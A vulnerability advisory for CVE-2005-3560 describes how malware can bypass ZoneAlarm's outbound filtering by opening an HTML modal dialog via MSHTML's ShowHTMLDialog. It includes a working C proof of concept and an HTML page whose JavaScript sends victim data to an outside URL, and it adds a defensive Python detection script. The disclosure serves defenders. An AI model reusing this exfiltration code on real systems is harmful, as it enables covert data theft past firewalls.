Zone Labs ShowHTMLDialog Bypassing Vulnerability

Summary

Zone Alarm Pro and Internet Security Suite are firewall programs for Microsoft Windows.

By exploiting Zone Labs' trust in certain web-based programs, a malicious program can bypass the protection of Zone Alarm Pro and Internet Security Suite and send information about the system to an attacker.

Credit:

The information has been provided by Debasis Mohanty.
The original article can be found at: http://www.hackingspirits.com/vuln-rnd/vuln-rnd.html


Details

Vulnerable Systems:
 * Zone Alarm Pro version 6.0.x
 * Zone Alarm Internet Security Suite version 6.0.x
 * Zone Alarm Firewall with Anti-Spyware version 6.1.x
 * Zone Alarm Firewall with Anti-Virus version 6.0.x
 * Zone Alarm Firewall (Free Version) version 6.0.x

Zone Alarm products with Advanced Program Control or OS Firewall Technology enabled detect and block almost all of the APIs (Shell, ShellExecuteEx, SetWindowText, SetDlgItem, etc.) that malicious programs commonly use to send data over HTTP by piggybacking on other trusted programs. However, it is still possible for a malicious program (a Trojan, worm, etc.) to make outbound connections to the attacker's site by piggybacking on the trusted Internet browser, using an 'HTML Modal Dialog' together with simple JavaScript. This assumes that the default browser (IE, Firefox, etc.) is authorized to access the Internet; in a default installation of ZoneAlarm Pro, IE is allowed Internet access.

Using the ShowHTMLDialog() function exported by MSHTML.DLL, any malicious program can create a modal dialog box that displays HTML. The HTML can in turn redirect the dialog to the attacker's site. Using this method, ZA Pro and Internet Security Suite were observed to be unable to block the Internet access. A malicious program can therefore use it to send data to the attacker over HTTP and, at the same time, receive command instructions from the attacker.

On successful exploitation the malicious program is able to send the victim's details and personal system information to the attacker, which can further lead to complete system compromise.
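The bypass hinges on a process that is not a browser loading MSHTML.DLL and resolving ShowHTMLDialog. One host-based check a defender can derive from that is to flag image-load events where MSHTML.DLL is loaded by a process outside the set expected to render HTML. The following is an added example, not code from the advisory or from Zone Labs; the event record format (key=value pairs separated by '|') is a constructed stand-in for a real image-load telemetry source, and the allow-list of expected hosts is an assumption to be tuned per environment.

```python
"""Flag unexpected loaders of MSHTML.DLL from image-load telemetry.

Added example (not from the advisory). The record format and the
allow-list below are assumptions, not a real product's schema.
"""
from dataclasses import dataclass
from typing import Iterable, List

# Processes for which loading MSHTML.DLL is expected (assumed allow-list;
# a real deployment would derive this from baseline telemetry).
EXPECTED_MSHTML_HOSTS = {
    "iexplore.exe",
    "explorer.exe",
    "mshta.exe",
}


@dataclass(frozen=True)
class ImageLoad:
    """One image-load event: the loading process and the loaded DLL."""
    process: str
    image: str


def parse_event(line: str) -> ImageLoad:
    """Parse one constructed 'process=<path>|image=<path>' record."""
    fields = {}
    for token in line.strip().split("|"):
        key, _, value = token.partition("=")
        fields[key.strip()] = value.strip()
    return ImageLoad(process=fields["process"], image=fields["image"])


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def suspicious_mshtml_loads(lines: Iterable[str]) -> List[ImageLoad]:
    """Return events where MSHTML.DLL is loaded by a non-allow-listed process.

    Comparison is case-insensitive because the DLL name may be logged in
    either case (the PoC passes "MSHTML.DLL" to LoadLibrary).
    """
    hits = []
    for line in lines:
        event = parse_event(line)
        if basename(event.image) != "mshtml.dll":
            continue
        if basename(event.process) in EXPECTED_MSHTML_HOSTS:
            continue
        hits.append(event)
    return hits


# Constructed sample telemetry: one browser load, one PoC-style load from a
# non-browser executable, one unrelated DLL, and one Explorer load.
SAMPLE_EVENTS = [
    "process=C:\\Program Files\\Internet Explorer\\iexplore.exe|image=C:\\WINDOWS\\system32\\mshtml.dll",
    "process=C:\\Users\\victim\\osfwbypass-demo.exe|image=C:\\WINDOWS\\system32\\MSHTML.DLL",
    "process=C:\\Users\\victim\\osfwbypass-demo.exe|image=C:\\WINDOWS\\system32\\urlmon.dll",
    "process=C:\\WINDOWS\\explorer.exe|image=C:\\WINDOWS\\system32\\mshtml.dll",
]


if __name__ == "__main__":
    for hit in suspicious_mshtml_loads(SAMPLE_EVENTS):
        print(f"ALERT: {hit.process} loaded {hit.image}")
```

The rule is deliberately narrow: it does not try to see the outbound HTTP request (which the advisory says the firewall misses), only the in-process prerequisite of loading the HTML engine. Expect some benign hits from applications that embed MSHTML for help or preview panes; those belong in the allow-list after review rather than in a blanket exclusion.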

Proof-of-Concept:
osfwbypass-demo.c:
#include <windows.h>
#include <mshtmhst.h>   /* SHOWHTMLDIALOGFN */
#include <urlmon.h>     /* CreateURLMoniker */

BOOL LoadHtmlDialog(void)
{
    HINSTANCE hinstMSHTML = LoadLibrary(TEXT("MSHTML.DLL"));

    if (hinstMSHTML)
    {
        SHOWHTMLDIALOGFN* pfnShowHTMLDialog;

        // Resolve the export that opens a modal dialog box of HTML content type
        // (GetProcAddress takes an ANSI name, so no TEXT() macro here)
        pfnShowHTMLDialog = (SHOWHTMLDIALOGFN*)GetProcAddress(hinstMSHTML, "ShowHTMLDialog");

        if (pfnShowHTMLDialog)
        {
            IMoniker *pURLMoniker = NULL;

            // Invoke the html file containing the data to be sent via http
            BSTR bstrURL = SysAllocString(L"c:\\modal-dialog.htm");
            CreateURLMoniker(NULL, bstrURL, &pURLMoniker);

            if (pURLMoniker)
            {
                (*pfnShowHTMLDialog)(NULL, pURLMoniker, NULL, NULL, NULL);
                pURLMoniker->Release();
            }

            SysFreeString(bstrURL);
        }

        FreeLibrary(hinstMSHTML);
    }

    return TRUE;
}
/* Eof */

modal-dialog.htm:
<html>
<head>
<meta http-equiv="Content-Language" content="en-us">
<title>Redirection Dialog</title>

<script language="JavaScript">
// Here goes the information logged by the malicious program which will
// be sent to the evil site via http request
var sTargetURL = "http://www.hackingspirits.com/vuln-rnd/demo/defeat-osfw.asp?[YourInformation Here]";
window.location.href = sTargetURL;
window.close();
</script>

</head>
</html>

CVE Information:
CVE-2005-3560

Disclosure Timeline:
10th Oct, 2005 - Bug originally discovered
15th Oct, 2005 - Vendor reported
15th Oct, 2005 - Vendor acknowledged the report
17th Oct, 2005 - Vendor asked for more information
19th Oct, 2005 - Vendor provided with more information and the version info on which the exploit was tested
29th Oct, 2005 - Final follow-up with the vendor but no response
8th Nov, 2005 - Public disclosure

Categories: Windows